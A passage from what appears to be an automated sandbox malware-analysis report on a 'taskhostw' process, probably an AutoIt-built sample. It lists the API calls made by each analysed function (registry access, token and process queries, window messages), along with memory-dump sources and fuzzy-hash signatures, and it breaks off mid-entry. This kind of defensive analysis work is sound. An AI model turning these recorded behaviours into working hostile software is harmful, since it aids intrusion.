                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                  • String ID: %s%d
                                                                  • API String ID: 1941087503-1110647743
                                                                  • Opcode ID: 0016a8162bc2e1ce6f8f4c5b3187152cddf6c6d5ee93653e9846d4fb938cb4c7
                                                                  • Instruction ID: 2fb528fe517e701eac8f3fa1134ac2a0195d3fe274633cc8913adc0a717d232a
                                                                  • Opcode Fuzzy Hash: 0016a8162bc2e1ce6f8f4c5b3187152cddf6c6d5ee93653e9846d4fb938cb4c7
                                                                  • Instruction Fuzzy Hash: 12119D71610309ABDF11BFA0ED8AFEA7768AF49710F4040B5F91CAA1D3CB7059658B71
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__swprintf_iswctype
                                                                  • String ID:
                                                                  • API String ID: 3564621516-0
                                                                  • Opcode ID: 1b156251998a5796ec22a55ff408394ee05bd1f02a5f166ac72514ed652129ee
                                                                  • Instruction ID: 93b913244e5fb0fa0be69cf65608ccad4bcd91549f4e2c15319bea23589e4db1
                                                                  • Opcode Fuzzy Hash: 1b156251998a5796ec22a55ff408394ee05bd1f02a5f166ac72514ed652129ee
                                                                  • Instruction Fuzzy Hash: E3A1BC71204703AFD715DF24C994BABB7E9FF44318F108A2AE999D3190EF30A949CB91
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0022ED1B
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0022ED4B
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0022EE7E
                                                                  • CloseHandle.KERNEL32(?), ref: 0022EEFF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: a577509af8f76bc12d899e30b8dbc97c2c74cc1fc2d97729ee7a8eef61b97f9a
                                                                  • Instruction ID: d36ec54f8b389472e484c308612dbd19810a0c09120d5f724fe3bc3ffb1976ae
                                                                  • Opcode Fuzzy Hash: a577509af8f76bc12d899e30b8dbc97c2c74cc1fc2d97729ee7a8eef61b97f9a
                                                                  • Instruction Fuzzy Hash: 2C819471610311AFD720DF28D846F6AB7E5AF58B20F05885DF699DB292DB70EC01CB51
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1559183368-0
                                                                  • Opcode ID: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
                                                                  • Instruction ID: 3187a2ed513d6ea1d8f16c50d2ccb87a697a13e7023e89186d3ece94107fd031
                                                                  • Opcode Fuzzy Hash: b9def032260d9a3caaa91155f958eb498d8e5f05eb94be06408ff888cba06e66
                                                                  • Instruction Fuzzy Hash: 2451CF35A00705DBDB248FA9CC8066EBBB6FF88324F148729E825962D0DF719950DB48
                                                                  APIs
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                    • Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230188
                                                                  • RegOpenKeyExW.ADVAPI32 ref: 002301C7
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0023020E
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0023023A
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00230247
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                  • String ID:
                                                                  • API String ID: 3440857362-0
                                                                  • Opcode ID: 3524f337d81e5ac289a0ce406292cecc7ee2f7cf111ea8cd747b7299e5bfdc7f
                                                                  • Instruction ID: 4fb7cf7775a83b28815c08476ab610b60eb7e2f37b8e3b220840d86bb9b07bca
                                                                  • Opcode Fuzzy Hash: 3524f337d81e5ac289a0ce406292cecc7ee2f7cf111ea8cd747b7299e5bfdc7f
                                                                  • Instruction Fuzzy Hash: 80516C71218201AFD704EF64DC95FAAB7E8FF84704F04892DF595872A1DB30E915CB62
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32 ref: 0021E6AB
                                                                  • GetPrivateProfileSectionW.KERNEL32 ref: 0021E6D4
                                                                  • WritePrivateProfileSectionW.KERNEL32 ref: 0021E713
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                  • WritePrivateProfileStringW.KERNEL32 ref: 0021E738
                                                                  • WritePrivateProfileStringW.KERNEL32 ref: 0021E740
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: 9e4ccf8ac941d1d652e9673dad9e39bb61374ad8562a2bc25f2ffb607943bd07
                                                                  • Instruction ID: c0bee3e181b216ad5204e602bb8653c384d4a1f0b62c5b2f918c9988ac99a214
                                                                  • Opcode Fuzzy Hash: 9e4ccf8ac941d1d652e9673dad9e39bb61374ad8562a2bc25f2ffb607943bd07
                                                                  • Instruction Fuzzy Hash: CF513935A00205EFCF01EF64C985AAEBBF5EF19314B148099E94AAB362CB31ED51CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 917f73987458abaddd72490a7f14154a95088facdb4b03b8798780d221cf2d1d
                                                                  • Instruction ID: 2d8c82cf2ad6637b080e5e696a546a695f8bcea26888b86cc0e7afdb3e001fa0
                                                                  • Opcode Fuzzy Hash: 917f73987458abaddd72490a7f14154a95088facdb4b03b8798780d221cf2d1d
                                                                  • Instruction Fuzzy Hash: 7E4117B5D20115AFCB10DF28DC49FA9BBA8EB09320F150275F8EEA72E1C7709D61DA51
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 20ac6ec53111be6abeb9cf792b78c35f8b42ce0c4b35bfb4626513f02bc6d186
                                                                  • Instruction ID: 4b8b3da1bc6ae657397eba5a7034cf6be546de9192846648f24e6ebe60da8e8a
                                                                  • Opcode Fuzzy Hash: 20ac6ec53111be6abeb9cf792b78c35f8b42ce0c4b35bfb4626513f02bc6d186
                                                                  • Instruction Fuzzy Hash: C541A375904505FBCF199F65CC48AEDBBB4FB09360F10432AF829922A1C7346995DFD0
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020673D
                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00206789
                                                                  • TranslateMessage.USER32(?), ref: 002067B2
                                                                  • DispatchMessageW.USER32(?), ref: 002067BC
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002067CB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                  • String ID:
                                                                  • API String ID: 2108273632-0
                                                                  • Opcode ID: 5ebf386b71c104a7a9978e0516c635fd767cf17b5503573801645443cd91ea90
                                                                  • Instruction ID: 2c010a6a6243f30a8ebc465a9a3afec880d3b1d6c43917792f6088fb479669b1
                                                                  • Opcode Fuzzy Hash: 5ebf386b71c104a7a9978e0516c635fd767cf17b5503573801645443cd91ea90
                                                                  • Instruction Fuzzy Hash: 0A31B2309207179BDB208FB4A84DFA6FBACEB04308F144125E425C60F2E765A8B9DB60
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00208CF2
                                                                  • PostMessageW.USER32 ref: 00208D9C
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00208DA4
                                                                  • PostMessageW.USER32 ref: 00208DB2
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00208DBA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 22ca984d3fc62d53655b9025caf4e2667ca435ffb3af3f85a39f4a66c61e6340
                                                                  • Instruction ID: 100f07e862b52db529da05cae49e39fda2d7c54ad9312027608af5ac047cd3bb
                                                                  • Opcode Fuzzy Hash: 22ca984d3fc62d53655b9025caf4e2667ca435ffb3af3f85a39f4a66c61e6340
                                                                  • Instruction Fuzzy Hash: 6231DF3190021AEBDB04CF78E94DA9F3BB5EB14315F104329F968E61D1C7B09924CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$_memmove_strcat
                                                                  • String ID:
                                                                  • API String ID: 559723171-0
                                                                  • Opcode ID: 39c3ec6b07b3e279c347239306d99adfbd8a5880f3e22440b46f4ae307d65432
                                                                  • Instruction ID: 80d9bacb57ef30ec0114e0af4499369c8ed765936babb636ee0a084b93c8f5a0
                                                                  • Opcode Fuzzy Hash: 39c3ec6b07b3e279c347239306d99adfbd8a5880f3e22440b46f4ae307d65432
                                                                  • Instruction Fuzzy Hash: E711D232904114ABDF21B760DD89EDE77ACDF01710F0405FAE549D6092EF759A85CB68
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
                                                                  • Instruction ID: 93b36d84c210b1fba4bdb28c1e6f4a245874b0c2f09b6ec75657204d937e526e
                                                                  • Opcode Fuzzy Hash: 4e1b6e67d44f2b171d6f533ec532ea2a352de437404ae0b7aec8cd3365c584ed
                                                                  • Instruction Fuzzy Hash: 32018CB26401097BA70466119E91F7F776DAE20288F004462FD0497A41FFA4EE10C6F9
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00214B61
                                                                  • __beginthreadex.LIBCMT ref: 00214B7F
                                                                  • MessageBoxW.USER32 ref: 00214B94
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00214BAA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00214BB1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 3824534824-0
                                                                  • Opcode ID: 95a4b867c573ff56a9d3fbbc7919eb82bab6c64f72bcde58bba275f52c7a50a1
                                                                  • Instruction ID: 4572f89229037ed9cf79c6906643ef1ba23b9416e2e63760f8724ed541ceb14d
                                                                  • Opcode Fuzzy Hash: 95a4b867c573ff56a9d3fbbc7919eb82bab6c64f72bcde58bba275f52c7a50a1
                                                                  • Instruction Fuzzy Hash: 1C114C72D04619BBC7009FB8FC08ADA7FECAB55324F140265FC18D3251D6B1CD8087A0
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00208546
                                                                  • GetLastError.KERNEL32(?,0020800A,?,?,?), ref: 00208550
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0020800A,?,?,?), ref: 0020855F
                                                                  • HeapAlloc.KERNEL32(00000000,?,0020800A,?,?,?), ref: 00208566
                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020857D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: d6463d8c0cfa1429c3d43d2430051e8e4f76ea54eb9e231c51890bfdee8b58f6
                                                                  • Instruction ID: 8a99a9afa6f820ece5f2d0a19cd2a9740593c16c2d8f11931d03a2ceb9779803
                                                                  • Opcode Fuzzy Hash: d6463d8c0cfa1429c3d43d2430051e8e4f76ea54eb9e231c51890bfdee8b58f6
                                                                  • Instruction Fuzzy Hash: 00014B71610215EFDB214FA6FD4CD6B7FACEF89355754056AF889D2260DA328D10CA60
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002083E8
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002083F2
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00208401
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00208408
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0020841E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 716d03617d298dbbc13a22f92f62584cb11504655de6f27419e41319792b0b05
                                                                  • Instruction ID: 4aed2dcb07b431287eb0ca7b2dc4cdb26e84e3b0cc3616cdc247b0b74f6e33e0
                                                                  • Opcode Fuzzy Hash: 716d03617d298dbbc13a22f92f62584cb11504655de6f27419e41319792b0b05
                                                                  • Instruction Fuzzy Hash: 92F0C230614306EFEB101FA4FC8CE6B3BACEF89764B400025F989C21A1CB70DC55DA61
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00208449
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00208453
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00208462
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00208469
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0020847F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 95ec95a30dc6b47f9d9971ae824283c0ac41d9e8f32cf2ee2b310c738d54e28c
                                                                  • Instruction ID: 488f96ab579b7179945ee837f3e7ad9816d7896116155dd257323bf18056595d
                                                                  • Opcode Fuzzy Hash: 95ec95a30dc6b47f9d9971ae824283c0ac41d9e8f32cf2ee2b310c738d54e28c
                                                                  • Instruction Fuzzy Hash: 52F0A930210306EFEB611FA4FCCCEAB3FACEF89754B040029F989C31A1CA609814DA70
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0020C4B9
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0020C4D0
                                                                  • MessageBeep.USER32(00000000), ref: 0020C4E8
                                                                  • KillTimer.USER32 ref: 0020C504
                                                                  • EndDialog.USER32 ref: 0020C51E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 62032d139b9e554a9fbce2442103462c34f431aed5c7a936fa274d564fde4453
                                                                  • Instruction ID: 7e68451e41f12d54965b328c3e9cdd79c553c6a7832dd1b501ff231a5c4bf366
                                                                  • Opcode Fuzzy Hash: 62032d139b9e554a9fbce2442103462c34f431aed5c7a936fa274d564fde4453
                                                                  • Instruction Fuzzy Hash: AF016D70910705ABEB205F20FE4EBA67BBCFF00705F100669E592A14E2DBE4A9658E80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _iswctype_wcscpy
                                                                  • String ID: AU3!$EA06
                                                                  • API String ID: 2497406411-2658333250
                                                                  • Opcode ID: 539d3749f4906b8c3445b0c6d9bae553d1ce24399277511170f8d7484687ce52
                                                                  • Instruction ID: c377cfcfd22d1372a85ee2746ff545a289cd5460e856cdd5c4e8160c7d0011fe
                                                                  • Opcode Fuzzy Hash: 539d3749f4906b8c3445b0c6d9bae553d1ce24399277511170f8d7484687ce52
                                                                  • Instruction Fuzzy Hash: 2D027B715483519FC724EF24C990AAFBBEAAF99714F40491DF88A932A0DF30D949CF52
                                                                  APIs
                                                                    • Part of subcall function 02A58D97: __itow.LIBCMT ref: 02A58DC2
                                                                    • Part of subcall function 02A58D97: __swprintf.LIBCMT ref: 02A58E0C
                                                                    • Part of subcall function 02A6F206: _wcscpy.LIBCMT ref: 02A6F229
                                                                  • _wcstok.LIBCMT ref: 02ABE120
                                                                  • _wcscpy.LIBCMT ref: 02ABE1AF
                                                                  • _memset.LIBCMT ref: 02ABE1E2
                                                                  Strings
                                                                  Memory Dump Source
